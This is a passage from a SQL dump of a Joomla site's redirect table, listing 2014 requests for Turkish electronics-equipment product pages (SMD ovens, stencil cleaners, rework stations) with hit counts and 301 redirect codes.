10:44:56','0000-00-00 00:00:00',301),(4554,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=160&Itemid=161&lang=tr','','','',3,0,'2014-08-26 10:51:26','0000-00-00 00:00:00',301),(4555,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=124&Itemid=130&lang=en','','','',1,0,'2014-08-26 11:00:32','0000-00-00 00:00:00',301),(4556,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=83:neomark&catid=51:neo&Itemid=&lang=tr','','','',1,0,'2014-08-26 11:05:58','0000-00-00 00:00:00',301),(4557,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36&Itemid=0&lang=tr','','','',1,0,'2014-08-26 11:20:53','0000-00-00 00:00:00',301),(4558,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=119:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=117&lang=en','','','',8,0,'2014-08-26 11:23:30','0000-00-00 00:00:00',301),(4559,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=93&Itemid=104&lang=en','','','',36,0,'2014-08-26 11:39:28','0000-00-00 00:00:00',301),(4560,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=49&Itemid=61&lang=en','','','',35,0,'2014-08-26 11:39:39','0000-00-00 00:00:00',301),(4561,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=51&Itemid=92&lang=en','','','',35,0,'2014-08-26 11:39:47','0000-00-00 00:00:00',301),(4562,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=53&Itemid=110&lang=en','','','',35,0,'2014-08-26 11:40:01','0000-00-00 00:00:00',301),(4563,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=36&Itemid=&lang=en','','','',1,0,'2014-08-26 11:53:48','0000-00-00 00:00:00',301),(4564,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=163&lang=en','','','',3,0,'2014-08-26 12:02:57','0000-00-00 00:00:00',301),(4565,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=90&Itemid=102','','','',1,0,'2014-08-26 12:15:57','0000-00-00 00:00:00',301),(4566,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=99&Itemid=43&lang=en','','','',3,0,'2014-08-26 12:16:45','0000-00-00 00:00:00',301),(4567,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=88&Itemid=100&lang=tr','','','',2,0,'2014-08-26 12:19:38','0000-00-00 00:00:00',301),(4568,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=90&Itemid=102','','','',1,0,'2014-08-26 12:30:39','0000-00-00 00:00:00',301),(4569,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=55&Itemid=1&lang=tr','','','',3,0,'2014-08-26 12:35:36','0000-00-00 00:00:00',301),(4570,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=172:avb1&catid=60:ikinciel&Itemid=0&lang=en','','','',1,0,'2014-08-26 12:45:50','0000-00-00 00:00:00',301),(4571,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=156&Itemid=157&lang=en','','','',3,0,'2014-08-26 12:54:58','0000-00-00 00:00:00',301),(4572,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=49&Itemid=&lang=tr','','','',1,0,'2014-08-26 12:55:37','0000-00-00 00:00:00',301),(4573,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=&lang=en','','','',1,0,'2014-08-26 12:57:15','0000-00-00 00:00:00',301),(4574,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=0&lang=tr','','','',1,0,'2014-08-26 13:04:26','0000-00-00 00:00:00',301),(4575,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=59&Itemid=&lang=en','','','',1,0,'2014-08-26 14:41:14','0000-00-00 00:00:00',301),(4576,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43&Itemid=0&lang=tr','','','',1,0,'2014-08-26 15:19:25','0000-00-00 00:00:00',301),(4577,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164:ews-310&catid=44:pota&Itemid=0&lang=en','','','',1,0,'2014-08-26 15:43:17','0000-00-00 00:00:00',301),(4578,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=&lang=en','','','',1,0,'2014-08-26 16:43:50','0000-00-00 00:00:00',301),(4579,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=73:ly-8c&catid=41:smd-firin&Itemid=0&lang=en','','','',1,0,'2014-08-26 16:49:30','0000-00-00 00:00:00',301),(4580,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166:lfs-1&catid=44:pota&Itemid=&lang=tr','','','',1,0,'2014-08-26 16:51:43','0000-00-00 00:00:00',301),(4581,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&Itemid=60&lang=tr&limitstart=10','','','',2,0,'2014-08-26 19:03:42','0000-00-00 00:00:00',301),(4582,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=83&Itemid=95&lang=tr','','','',3,0,'2014-08-26 19:10:25','0000-00-00 00:00:00',301),(4583,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=&lang=en','','','',1,0,'2014-08-26 19:15:23','0000-00-00 00:00:00',301),(4584,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=115&Itemid=126&lang=en','','','',1,0,'2014-08-26 19:34:09','0000-00-00 00:00:00',301),(4585,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=110:ekonomik-flux-giderici-pro&catid=40:temizleme&Itemid=121&lang=tr','','','',4,0,'2014-08-26 19:35:06','0000-00-00 00:00:00',301),(4586,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=147:sp18p-l-screen-printer&catid=57:screen-printer&Itemid=146&lang=tr','','','',2,0,'2014-08-26 20:29:19','0000-00-00 00:00:00',301),(4587,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=0&lang=tr','','','',1,0,'2014-08-26 20:41:44','0000-00-00 00:00:00',301),(4588,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=115%3Akutulanmis-hava-air&catid=40%3Atemizleme&Itemid=126&lang=en','','','',1,0,'2014-08-26 20:45:40','0000-00-00 00:00:00',301),(4589,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=147&Itemid=146&lang=tr','','','',1,0,'2014-08-26 20:57:43','0000-00-00 00:00:00',301),(4590,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=71:rl131&catid=42:th-dizgi&Itemid=79&lang=tr','','','',5,0,'2014-08-26 21:15:44','0000-00-00 00:00:00',301),(4591,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=147:sp18p-l-screen-printer&catid=57:screen-printer&Itemid=146&lang=tr','','','',1,0,'2014-08-26 21:42:16','0000-00-00 00:00:00',301),(4592,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=147%3Asp18p-l-screen-printer&catid=57%3Ascreen-printer&Itemid=146&lang=tr','','','',1,0,'2014-08-26 22:01:16','0000-00-00 00:00:00',301),(4593,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=59&Itemid=155&lang=en','','','',1,0,'2014-08-26 22:08:49','0000-00-00 00:00:00',301),(4594,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=147&Itemid=146','','','',1,0,'2014-08-26 22:11:28','0000-00-00 00:00:00',301),(4595,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=147&Itemid=146&lang=tr','','','',5,0,'2014-08-26 22:24:18','0000-00-00 00:00:00',301),(4596,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=59:bolgesel-lehimleme-mak&Itemid=155&layout=default&lang=en','','','',1,0,'2014-08-26 22:25:00','0000-00-00 00:00:00',301),(4597,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=122:stencilwasher-eco&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=129&lang=en','','','',10,0,'2014-08-26 23:09:25','0000-00-00 00:00:00',301),(4598,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28&lang=tr','','','',6,0,'2014-08-26 23:17:42','0000-00-00 00:00:00',301),(4599,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51:neo&Itemid=92&layout=default&lang=en','','','',5,0,'2014-08-26 23:21:23','0000-00-00 00:00:00',301),(4600,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=97&Itemid=108&lang=en','','','',5,0,'2014-08-26 23:21:24','0000-00-00 00:00:00',301),(4601,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28&lang=tr','','','',4,0,'2014-08-26 23:55:59','0000-00-00 00:00:00',301),(4602,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=146:manual-printer&catid=57:screen-printer&Itemid=148&lang=en','','','',2,0,'2014-08-27 00:20:38','0000-00-00 00:00:00',301),(4603,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=146&Itemid=148&lang=en','','','',1,0,'2014-08-27 00:30:08','0000-00-00 00:00:00',301),(4604,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51:neo&Itemid=92&layout=default&lang=en','','','',1,0,'2014-08-27 00:42:24','0000-00-00 00:00:00',301),(4605,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=98&Itemid=109&lang=en','','','',1,0,'2014-08-27 00:53:42','0000-00-00 00:00:00',301),(4606,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=117:optik-cihaz-temizleyicileri&catid=40:temizleme&Itemid=&lang=tr','','','',1,0,'2014-08-27 01:32:46','0000-00-00 00:00:00',301),(4607,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153&Itemid=154&lang=en','','','',2,0,'2014-08-27 02:04:09','0000-00-00 00:00:00',301),(4608,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=71:rl131&catid=42:th-dizgi&Itemid=&lang=tr','','','',1,0,'2014-08-27 02:30:15','0000-00-00 00:00:00',301),(4609,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146:manual-printer&catid=57:screen-printer&Itemid=148&lang=en','','','',1,0,'2014-08-27 02:31:24','0000-00-00 00:00:00',301),(4610,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36:orta-hizli&Itemid=37&layout=default&lang=en','','','',1,0,'2014-08-27 02:43:02','0000-00-00 00:00:00',301),(4611,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=55&Itemid=1&lang=tr','','','',1,0,'2014-08-27 02:47:05','0000-00-00 00:00:00',301),(4612,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=55&Itemid=1&lang=tr','','','',1,0,'2014-08-27 02:54:06','0000-00-00 00:00:00',301),(4613,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=28&lang=en','','','',2,0,'2014-08-27 02:55:04','0000-00-00 00:00:00',301),(4614,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44&Itemid=&lang=en','','','',1,0,'2014-08-27 02:57:10','0000-00-00 00:00:00',301),(4615,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=136:chipper-smd-500&catid=56:rework-stasyonlari&Itemid=138&lang=tr','','','',2,0,'2014-08-27 03:23:09','0000-00-00 00:00:00',301),(4616,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59&Itemid=0&lang=en','','','',1,0,'2014-08-27 03:34:33','0000-00-00 00:00:00',301),(4617,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=1&layout=blog&Itemid=28&lang=en','','','',1,0,'2014-08-27 03:35:43','0000-00-00 00:00:00',301),(4618,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=122&lang=tr','','','',2,0,'2014-08-27 03:49:40','0000-00-00 00:00:00',301),(4619,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=73:ly-8c&catid=41:smd-firin&Itemid=82&lang=en','','','',9,0,'2014-08-27 03:55:42','0000-00-00 00:00:00',301),(4620,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=1&layout=blog&Itemid=28&lang=en','','','',1,0,'2014-08-27 04:04:43','0000-00-00 00:00:00',301),(4621,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=28&lang=en','','','',1,0,'2014-08-27 04:04:54','0000-00-00 00:00:00',301),(4622,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=122&lang=tr','','','',2,0,'2014-08-27 04:05:30','0000-00-00 00:00:00',301),(4623,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=136&Itemid=138','','','',2,0,'2014-08-27 04:07:37','0000-00-00 00:00:00',301),(4624,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=107:yuksek-guclu-flux-giderici-frc&catid=40:temizleme&Itemid=118&lang=tr','','','',2,0,'2014-08-27 04:07:57','0000-00-00 00:00:00',301),(4625,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=107:yuksek-guclu-flux-giderici-frc&catid=40:temizleme&Itemid=118','','','',2,0,'2014-08-27 04:09:54','0000-00-00 00:00:00',301),(4626,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=164:ews-310&catid=44:pota&Itemid=0&lang=en','','','',1,0,'2014-08-27 04:23:42','0000-00-00 00:00:00',301),(4627,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=124&lang=en','','','',3,0,'2014-08-27 04:40:58','0000-00-00 00:00:00',301),(4628,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=174:rh61&catid=60:ikinciel&Itemid=&lang=en','','','',1,0,'2014-08-27 05:02:39','0000-00-00 00:00:00',301),(4629,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111:stencil-temizleme-bga&catid=40:temizleme&Itemid=122','','','',1,0,'2014-08-27 05:05:30','0000-00-00 00:00:00',301),(4630,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=136&Itemid=138&lang=tr','','','',1,0,'2014-08-27 05:06:34','0000-00-00 00:00:00',301),(4631,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54:pcb-ve-stensil-temizleme-makineleri&Itemid=114&layout=default&lang=tr','','','',4,0,'2014-08-27 05:07:09','0000-00-00 00:00:00',301),(4632,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111&Itemid=122','','','',1,0,'2014-08-27 05:21:41','0000-00-00 00:00:00',301),(4633,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=59&amp=&Itemid=0&lang=en','','','',13,0,'2014-08-27 05:36:46','0000-00-00 00:00:00',301),(4634,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=59&amp=&Itemid=0&lang=tr','','','',13,0,'2014-08-27 05:36:54','0000-00-00 00:00:00',301),(4635,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=1&layout=blog&Itemid=28&lang=en','','','',1,0,'2014-08-27 05:46:26','0000-00-00 00:00:00',301),(4636,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=111&Itemid=122&lang=tr','','','',1,0,'2014-08-27 05:50:13','0000-00-00 00:00:00',301),(4637,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=156:lf-350b&catid=44:pota&Itemid=0&lang=en','','','',1,0,'2014-08-27 05:52:12','0000-00-00 00:00:00',301),(4638,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=40&Itemid=&lang=tr','','','',1,0,'2014-08-27 06:26:31','0000-00-00 00:00:00',301),(4639,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=140:sharpshooter&catid=56:rework-stasyonlari&Itemid=142&lang=tr','','','',9,0,'2014-08-27 06:35:45','0000-00-00 00:00:00',301),(4640,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=120&Itemid=116&lang=en','','','',2,0,'2014-08-27 06:40:25','0000-00-00 00:00:00',301),(4641,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=60&Itemid=164&lang=tr','','','',2,0,'2014-08-27 06:40:57','0000-00-00 00:00:00',301),(4642,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=119&Itemid=117&lang=en','','','',2,0,'2014-08-27 06:52:08','0000-00-00 00:00:00',301),(4643,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58:dusuk-hizli-smd-dizgi&Itemid=149&layout=default&lang=tr','','','',4,0,'2014-08-27 06:56:52','0000-00-00 00:00:00',301),(4644,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=153&Itemid=154&lang=tr','','','',2,0,'2014-08-27 07:00:33','0000-00-00 00:00:00',301),(4645,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=0&lang=tr','','','',1,0,'2014-08-27 07:35:17','0000-00-00 00:00:00',301),(4646,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=&lang=tr','','','',1,0,'2014-08-27 08:12:35','0000-00-00 00:00:00',301),(4647,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=159:gf-c2-ht&catid=41:smd-firin&Itemid=&lang=tr','','','',1,0,'2014-08-27 09:01:34','0000-00-00 00:00:00',301),(4648,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=122:stencilwasher-eco&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=0&lang=en','','','',1,0,'2014-08-27 09:37:58','0000-00-00 00:00:00',301),(4649,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=114&Itemid=124&lang=en','','','',1,0,'2014-08-27 09:39:06','0000-00-00 00:00:00',301),(4650,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=110:ekonomik-flux-giderici-pro&catid=40:temizleme&Itemid=0&lang=en','','','',1,0,'2014-08-27 11:28:37','0000-00-00 00:00:00',301),(4651,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=&lang=en','','','',1,0,'2014-08-27 11:30:15','0000-00-00 00:00:00',301),(4652,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=&lang=tr','','','',1,0,'2014-08-27 11:41:54','0000-00-00 00:00:00',301),(4653,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=&lang=en','','','',1,0,'2014-08-27 12:46:29','0000-00-00 00:00:00',301),(4654,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=0&lang=en','','','',1,0,'2014-08-27 13:13:24','0000-00-00 00:00:00',301),(4655,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=53&Itemid=0&lang=en','','','',1,0,'2014-08-27 14:01:58','0000-00-00 00:00:00',301),(4656,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&Itemid=0&lang=en','','','',1,0,'2014-08-27 14:06:50','0000-00-00 00:00:00',301),(4657,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=106:mi-300&catid=44:pota&Itemid=&lang=tr','','','',1,0,'2014-08-27 14:15:12','0000-00-00 00:00:00',301),(4658,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=72&Itemid=78&lang=en','','','',2,0,'2014-08-27 14:28:21','0000-00-00 00:00:00',301),(4659,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=154:spa-300&catid=59:bolgesel-lehimleme-mak&Itemid=0&lang=en','','','',1,0,'2014-08-27 15:36:03','0000-00-00 00:00:00',301),(4660,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=59&Itemid=0&lang=en','','','',1,0,'2014-08-27 15:48:24','0000-00-00 00:00:00',301),(4661,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=141:marksman&catid=56:rework-stasyonlari&Itemid=&lang=tr','','','',1,0,'2014-08-27 16:48:05','0000-00-00 00:00:00',301),(4662,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=1&layout=blog&lang=tr&limitstart=5','','','',1,0,'2014-08-27 17:09:13','0000-00-00 00:00:00',301),(4663,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=115:kutulanmis-hava-air&catid=40:temizleme&Itemid=&lang=en','','','',1,0,'2014-08-27 17:26:27','0000-00-00 00:00:00',301),(4664,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=44&Itemid=0&lang=tr','','','',1,0,'2014-08-27 17:30:21','0000-00-00 00:00:00',301),(4665,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51:neo&Itemid=92&layout=default','','','',2,0,'2014-08-27 17:30:34','0000-00-00 00:00:00',301),(4666,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42:th-dizgi&Itemid=27&layout=default&lang=en','','','',5,0,'2014-08-27 17:34:08','0000-00-00 00:00:00',301),(4667,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=53&Itemid=110&lang=en','','','',1,0,'2014-08-27 17:37:10','0000-00-00 00:00:00',301),(4668,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&Itemid=60&lang=tr','','','',2,0,'2014-08-27 17:39:19','0000-00-00 00:00:00',301),(4669,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=158:14fsfd&catid=44:pota&Itemid=159&lang=tr','','','',1,0,'2014-08-27 17:40:58','0000-00-00 00:00:00',301),(4670,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=97&Itemid=108&lang=tr','','','',2,0,'2014-08-27 17:44:15','0000-00-00 00:00:00',301),(4671,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46&Itemid=62','','','',2,0,'2014-08-27 17:48:37','0000-00-00 00:00:00',301),(4672,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=88&Itemid=100','','','',1,0,'2014-08-27 17:55:10','0000-00-00 00:00:00',301),(4673,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51:neo&Itemid=92&layout=default&lang=en','','','',2,0,'2014-08-27 17:56:15','0000-00-00 00:00:00',301),(4674,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=150&Itemid=151&lang=tr','','','',2,0,'2014-08-27 17:57:40','0000-00-00 00:00:00',301),(4675,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=53&Itemid=0&lang=tr','','','',1,0,'2014-08-27 18:20:44','0000-00-00 00:00:00',301),(4676,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164:ews-310&catid=44:pota&Itemid=0&lang=tr','','','',1,0,'2014-08-27 18:33:41','0000-00-00 00:00:00',301),(4677,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=&lang=tr','','','',1,0,'2014-08-27 18:36:50','0000-00-00 00:00:00',301),(4678,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=95&Itemid=106&lang=en','','','',2,0,'2014-08-27 19:14:29','0000-00-00 00:00:00',301),(4679,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=127&Itemid=134','','','',1,0,'2014-08-27 19:17:13','0000-00-00 00:00:00',301),(4680,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=94&Itemid=105','','','',1,0,'2014-08-27 19:21:36','0000-00-00 00:00:00',301),(4681,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=156&Itemid=157','','','',1,0,'2014-08-27 19:23:13','0000-00-00 00:00:00',301),(4682,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56&Itemid=137','','','',2,0,'2014-08-27 19:24:55','0000-00-00 00:00:00',301),(4683,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58:dusuk-hizli-smd-dizgi&Itemid=149&layout=default&lang=tr','','','',1,0,'2014-08-27 19:27:03','0000-00-00 00:00:00',301),(4684,'http://led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=164&Itemid=160&lang=tr','','','',3,0,'2014-08-27 19:28:41','0000-00-00 00:00:00',301),(4685,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=121&Itemid=115','','','',1,0,'2014-08-27 19:29:14','0000-00-00 00:00:00',301),(4686,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=47&Itemid=1&lang=en','','','',2,0,'2014-08-27 19:30:20','0000-00-00 00:00:00',301),(4687,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=106&Itemid=113&lang=en','','','',2,0,'2014-08-27 19:34:10','0000-00-00 00:00:00',301),(4688,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=147:sp18p-l-screen-printer&catid=57:screen-printer&Itemid=&lang=tr','','','',1,0,'2014-08-27 19:38:30','0000-00-00 00:00:00',301),(4689,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=tr','','','',4,0,'2014-08-27 19:38:34','0000-00-00 00:00:00',301),(4690,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=39:lehimleme&Itemid=57&layout=default&lang=tr','','','',1,0,'2014-08-27 19:39:04','0000-00-00 00:00:00',301),(4691,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=115:kutulanmis-hava-air&catid=40:temizleme&Itemid=126&lang=en','','','',2,0,'2014-08-27 19:40:42','0000-00-00 00:00:00',301),(4692,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56:rework-stasyonlari&Itemid=137&layout=default&lang=en','','','',4,0,'2014-08-27 19:41:48','0000-00-00 00:00:00',301),(4693,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=107&Itemid=118&lang=en','','','',2,0,'2014-08-27 19:42:21','0000-00-00 00:00:00',301),(4694,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=139&Itemid=141&lang=tr','','','',2,0,'2014-08-27 19:44:32','0000-00-00 00:00:00',301),(4695,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=59:bolgesel-lehimleme-mak&Itemid=155&layout=default','','','',3,0,'2014-08-27 19:45:38','0000-00-00 00:00:00',301),(4696,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=107:yuksek-guclu-flux-giderici-frc&catid=40:temizleme&Itemid=118&lang=en','','','',2,0,'2014-08-27 19:47:48','0000-00-00 